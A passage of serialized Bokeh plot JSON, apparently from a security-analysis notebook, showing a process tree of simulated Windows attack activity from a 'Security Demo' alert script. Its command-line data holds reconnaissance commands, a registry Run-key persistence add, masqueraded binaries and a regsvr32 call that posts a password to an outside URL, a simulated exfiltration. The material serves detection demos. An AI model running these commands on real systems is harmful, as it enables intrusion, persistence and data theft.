indows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\"],\"NodeRole\":[\"NaN\",\"parent\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"sibling\",\"source\",\"sibling\",\"sibling\",\"sibling\"],\"PID\":[\"PID: 0x498 (1176)\",\"PID: 0x12f4 (4852)\",\"PID: 0x6dc (1756)\",\"PID: 0x6e8 (1768)\",\"PID: 0xd98 (3480)\",\"PID: 0xfe4 (4068)\",\"PID: 0x2f0 (752)\",\"PID: 0x18c (396)\",\"PID: 0x13a0 (5024)\",\"PID: 0x10dc (4316)\",\"PID: 0x114c (4428)\",\"PID: 0xfa4 (4004)\",\"PID: 0x1164 (4452)\",\"PID: 0x12b0 (4784)\",\"PID: 0x1150 (4432)\",\"PID: 0xdd4 (3540)\",\"PID: 0xc34 (3124)\",\"PID: 0xc64 (3172)\"],\"ParentProcessName\":[\"NaN\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\"],\"ProcessId\":[\"NaN\",\"0x498\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\",\"0x12f4\"],\"ProcessId1\":[\"NaN\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],\"ProcessId_par\":[\"NaN\",\"NaN\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\",\"0x498\"],\"Row\":[18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1],\"SourceComputerId\":[\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\"],\"SubjectDomainName\":[\"NaN\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"SubjectLogonId\":[\"0x3e7\",\"0x3e7\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\",\"0x78225e\"],\"SubjectUserName\":[\"NaN\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\"],\"SubjectUserSid\":[\"NaN\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\"],\"TargetLogonId\":[\"NaN\",\"0x78225e\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\"],\"TenantId\":[\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\"],\"TimeCreatedUtc\":{\"__ndarray__\":\"/Knx0k1iQMMAcP2QvY52QgAQ/pC9jnZCADBDkb2OdkIAcESRvY52QgCgTZG9jnZCALBPkb2OdkIAkFGRvY52QgCwVJG9jnZCAPBVkb2OdkIAUBiRvY52QgCQGZG9jnZCAJAakb2OdkIAICORvY52QgCwMJG9jnZCAKA0kb2OdkIAAD6RvY52QgCQQZG9jnZC\",\"dtype\":\"float64\",\"shape\":[18]},\"TimeGenerated\":{\"__ndarray__\":\"AAAAAAAAAAAAcP2QvY52QgAQ/pC9jnZCADBDkb2OdkIAcESRvY52QgCgTZG9jnZCALBPkb2OdkIAkFGRvY52QgCwVJG9jnZCAPBVkb2OdkIAUBiRvY52QgCQGZG9jnZCAJAakb2OdkIAICORvY52QgCwMJG9jnZCAKA0kb2OdkIAAD6RvY52QgCQQZG9jnZC\",\"dtype\":\"float64\",\"shape\":[18]},\"TimeGenerated_orig_par\":{\"__ndarray__\":\"/Knx0k1iQMMAAAAAAAAAAABw/ZC9jnZCAHD9kL2OdkIAcP2QvY52QgBw/ZC9jnZCAHD9kL2OdkIAcP2QvY52QgBw/ZC9jnZCAHD9kL2OdkIAcP2QvY52QgBw/ZC9jnZCAHD9kL2OdkIAcP2QvY52QgBw/ZC9jnZCAHD9kL2OdkIAcP2QvY52QgBw/ZC9jnZC\",\"dtype\":\"float64\",\"shape\":[18]},\"TokenElevationType\":[\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"cmd\":[\"cmdline unknown\",\"cmd.exe /c c:\\\\Diagnostics\\\\WinSimulateAlerts.cmd c:\\\\W!ndows\\\\System32 3\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"hostname\",\"netstat -an\",\"net user Bob1 /domain\",\"net user BobX /domain\",\"net group \\\"Domain Admins\\\" /domain\",\".\\\\reg.exe add \\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"cmd /c echo End Security Demo tasks\",\"cmd /c echo Begin Security Demo tasks\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\".\\\\rundll32.exe /C c:\\\\windows\\\\fonts\\\\conhost.exe zip archive.mdb\",\".\\\\regsvr32 /u /s c:\\\\windows\\\\fonts\\\\csrss.exe \\\"http://www.401k.com/upload?pass=34592389\\\" post\",\"tasklist\",\"net localgroup Administrators\",\"whoami\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17],\"new_process_lc\":[\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\hostname.exe\",\"c:\\\\windows\\\\system32\\\\netstat.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\w!ndows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\w!ndows\\\\system32\\\\rundll32.exe\",\"c:\\\\w!ndows\\\\system32\\\\regsvr32.exe\",\"c:\\\\windows\\\\system32\\\\tasklist.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\whoami.exe\"],\"new_process_lc_par\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\"],\"parent_index\":[\"NaN\",\"17\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\"],\"parent_key\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x4981970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\"],\"parent_proc_lc\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\"],\"path\":[\"17\",\"17/0\",\"17/0/1\",\"17/0/10\",\"17/0/11\",\"17/0/12\",\"17/0/13\",\"17/0/14\",\"17/0/15\",\"17/0/16\",\"17/0/2\",\"17/0/3\",\"17/0/4\",\"17/0/5\",\"17/0/6\",\"17/0/7\",\"17/0/8\",\"17/0/9\"],\"proc_key\":[\"c:\\\\windows\\\\system32\\\\svchost.exe0x4981970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f42019-02-14 11:51:37.687000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x6dc2019-02-14 11:51:37.697000\",\"c:\\\\windows\\\\system32\\\\hostname.exe0x6e82019-02-14 11:51:38.803000\",\"c:\\\\windows\\\\system32\\\\netstat.exe0xd982019-02-14 11:51:38.823000\",\"c:\\\\windows\\\\system32\\\\net.exe0xfe42019-02-14 11:51:38.970000\",\"c:\\\\windows\\\\system32\\\\net.exe0x2f02019-02-14 11:51:39.003000\",\"c:\\\\windows\\\\system32\\\\net.exe0x18c2019-02-14 11:51:39.033000\",\"c:\\\\w!ndows\\\\system32\\\\reg.exe0x13a02019-02-14 11:51:39.083000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x10dc2019-02-14 11:51:39.103000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x114c2019-02-14 11:51:38.117000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xfa42019-02-14 11:51:38.137000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11642019-02-14 11:51:38.153000\",\"c:\\\\w!ndows\\\\system32\\\\rundll32.exe0x12b02019-02-14 11:51:38.290000\",\"c:\\\\w!ndows\\\\system32\\\\regsvr32.exe0x11502019-02-14 11:51:38.507000\",\"c:\\\\windows\\\\system32\\\\tasklist.exe0xdd42019-02-14 11:51:38.570000\",\"c:\\\\windows\\\\system32\\\\net.exe0xc342019-02-14 11:51:38.720000\",\"c:\\\\windows\\\\system32\\\\whoami.exe0xc642019-02-14 11:51:38.777000\"],\"source_index\":[\"17\",\"0\",\"1\",\"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\"],\"source_index_par\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAAD4fwAAAAAAADBAAAAAAAAAMEAAAAAAAAAwQAAAAAAAADBAAAAAAAAAMEAAAAAAAAAwQAAAAAAAADBAAAAAAAAAMEAAAAAAAAAwQAAAAAAAADBAAAAAAAAAMEAAAAAAAAAwQAAAAAAAADBAAAAAAAAAMEAAAAAAAAAwQAAAAAAAADBA\",\"dtype\":\"float64\",\"shape\":[18]}},\"selected\":{\"id\":\"1128\",\"type\":\"Selection\"},\"selection_policy\":{\"id\":\"1129\",\"type\":\"UnionRenderers\"}},\"id\":\"1002\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"text\":\"\"},\"id\":\"1127\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"1152\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1128\",\"type\":\"Selection\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1100\",\"type\":\"Rect\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1101\",\"type\":\"Rect\"},\"selection_glyph\":null,\"view\":{\"id\":\"1103\",\"type\":\"CDSView\"}},\"id\":\"1102\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1129\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1085\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"1130\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1131\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1135\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1132\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1086\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1051\",\"type\":\"Text\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1052\",\"type\":\"Text\"},\"selection_glyph\":null,\"view\":{\"id\":\"1054\",\"type\":\"CDSView\"}},\"id\":\"1053\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1089\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"1134\",\"type\":\"StringEditor\"},{\"attributes\":{\"overlay\":{\"id\":\"1156\",\"type\":\"BoxAnnotation\"}},\"id\":\"1087\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1025\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"1088\",\"type\":\"SaveTool\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1024\",\"type\":\"PanTool\"},{\"id\":\"1025\",\"type\":\"ResetTool\"},{\"id\":\"1026\",\"type\":\"SaveTool\"},{\"id\":\"1027\",\"type\":\"TapTool\"},{\"id\":\"1033\",\"type\":\"HoverTool\"}]},\"id\":\"1028\",\"type\":\"Toolbar\"},{\"attributes\":{\"text\":\"ProcessTree\"},\"id\":\"1004\",\"type\":\"Title\"},{\"attributes\":{\"below\":[{\"id\":\"1075\",\"type\":\"LinearAxis\"}],\"center\":[{\"id\":\"1079\",\"type\":\"Grid\"},{\"id\":\"1084\",\"type\":\"Grid\"}],\"left\":[{\"id\":\"1080\",\"type\":\"LinearAxis\"}],\"plot_height\":700,\"plot_width\":90,\"renderers\":[{\"id\":\"1102\",\"type\":\"GlyphRenderer\"}],\"title\":{\"id\":\"1127\",\"type\":\"Title\"},\"toolbar\":{\"id\":\"1091\",\"type\":\"Toolbar\"},\"x_range\":{\"id\":\"1067\",\"type\":\"DataRange1d\"},\"x_scale\":{\"id\":\"1071\",\"type\":\"LinearScale\"},\"y_range\":{\"id\":\"1069\",\"type\":\"Range1d\"},\"y_scale\":{\"id\":\"1073\",\"type\":\"LinearScale\"}},\"id\":\"1066\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"axis_line_color\":{\"value\":null},\"formatter\":{\"id\":\"1151\",\"type\":\"BasicTickFormatter\"},\"major_label_standoff\":0,\"major_tick_line_color\":{\"value\":\"navy\"},\"ticker\":{\"id\":\"1062\",\"type\":\"FixedTicker\"},\"visible\":false},\"id\":\"1014\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1071\",\"type\":\"LinearScale\"},{\"attributes\":{\"range\":{\"id\":\"1008\",\"type\":\"Range1d\"},\"value\":0.25},\"id\":\"1056\",\"type\":\"Dodge\"},{\"attributes\":{\"text\":{\"field\":\"PID\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1055\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1056\",\"type\":\"Dodge\"}}},\"id\":\"1058\",\"type\":\"Text\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"TimeGenerated\":\"datetime\"},\"renderers\":[{\"id\":\"1039\",\"type\":\"GlyphRenderer\"}],\"tooltips\":[[\"Process\",\"@NewProcessName\"],[\"PID\",\"@PID\"],[\"CmdLine\",\"@CommandLine\"],[\"SubjUser\",\"@SubjectUserName\"],[\"SubjLgnId\",\"@SubjectLogonId\"],[\"TargLgnId\",\"@TargetLogonId\"],[\"Time\",\"@TimeGenerated{%F %T}\"]]},\"id\":\"1033\",\"type\":\"HoverTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#1f77b4\"},\"height\":{\"units\":\"data\",\"value\":0.95},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1035\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1038\",\"type\":\"Rect\"},{\"attributes\":{\"range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"value\":1.75},\"id\":\"1035\",\"type\":\"Dodge\"},{\"attributes\":{\"callback\":null,\"end\":19,\"start\":-1},\"id\":\"1069\",\"type\":\"Range1d\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1047\",\"type\":\"CDSView\"},{\"attributes\":{\"range\":{\"id\":\"1008\",\"type\":\"Range1d\"},\"value\":-0.2},\"id\":\"1042\",\"type\":\"Dodge\"},{\"attributes\":{\"text\":{\"field\":\"cmd\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1041\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1042\",\"type\":\"Dodge\"}}},\"id\":\"1044\",\"type\":\"Text\"},{\"attributes\":{\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":{\"id\":\"1064\",\"type\":\"FixedTicker\"}},\"id\":\"1018\",\"type\":\"Grid\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1044\",\"type\":\"Text\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1045\",\"type\":\"Text\"},\"selection_glyph\":null,\"view\":{\"id\":\"1047\",\"type\":\"CDSView\"}},\"id\":\"1046\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"ticks\":[1,2,3]},\"id\":\"1064\",\"type\":\"FixedTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"value\":\"navy\"},\"height\":{\"units\":\"data\",\"value\":0.95},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1035\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1037\",\"type\":\"Rect\"},{\"attributes\":{\"range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"value\":0.1},\"id\":\"1048\",\"type\":\"Dodge\"},{\"attributes\":{\"text\":{\"field\":\"Exe\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1048\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1049\",\"type\":\"Dodge\"}}},\"id\":\"1051\",\"type\":\"Text\"},{\"attributes\":{\"callback\":null},\"id\":\"1027\",\"type\":\"TapTool\"},{\"attributes\":{\"range\":{\"id\":\"1008\",\"type\":\"Range1d\"},\"value\":0.25},\"id\":\"1049\",\"type\":\"Dodge\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1054\",\"type\":\"CDSView\"},{\"attributes\":{\"text\":{\"field\":\"Exe\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1048\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1049\",\"type\":\"Dodge\"}}},\"id\":\"1052\",\"type\":\"Text\"},{\"attributes\":{\"range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"value\":1.8},\"id\":\"1055\",\"type\":\"Dodge\"},{\"attributes\":{\"range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"value\":0.1},\"id\":\"1041\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1012\",\"type\":\"LinearScale\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1037\",\"type\":\"Rect\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1038\",\"type\":\"Rect\"},\"selection_glyph\":null,\"view\":{\"id\":\"1040\",\"type\":\"CDSView\"}},\"id\":\"1039\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1040\",\"type\":\"CDSView\"},{\"attributes\":{\"callback\":null,\"end\":19,\"start\":-2},\"id\":\"1008\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1010\",\"type\":\"LinearScale\"},{\"attributes\":{\"axis_line_color\":{\"value\":null},\"formatter\":{\"id\":\"1149\",\"type\":\"BasicTickFormatter\"},\"major_label_standoff\":0,\"major_tick_line_color\":{\"value\":\"navy\"},\"ticker\":{\"id\":\"1020\",\"type\":\"BasicTicker\"},\"visible\":false},\"id\":\"1019\",\"type\":\"LinearAxis\"},{\"attributes\":{\"callback\":null},\"id\":\"1067\",\"type\":\"DataRange1d\"},{\"attributes\":{},\"id\":\"1026\",\"type\":\"SaveTool\"},{\"attributes\":{\"dimension\":1,\"grid_line_color\":\"navy\",\"ticker\":{\"id\":\"1020\",\"type\":\"BasicTicker\"},\"visible\":false},\"id\":\"1023\",\"type\":\"Grid\"},{\"attributes\":{\"text\":{\"field\":\"cmd\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1041\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1042\",\"type\":\"Dodge\"}}},\"id\":\"1045\",\"type\":\"Text\"}],\"root_ids\":[\"1124\"]},\"title\":\"Bokeh Application\",\"version\":\"1.3.4\"}};\n var render_items = 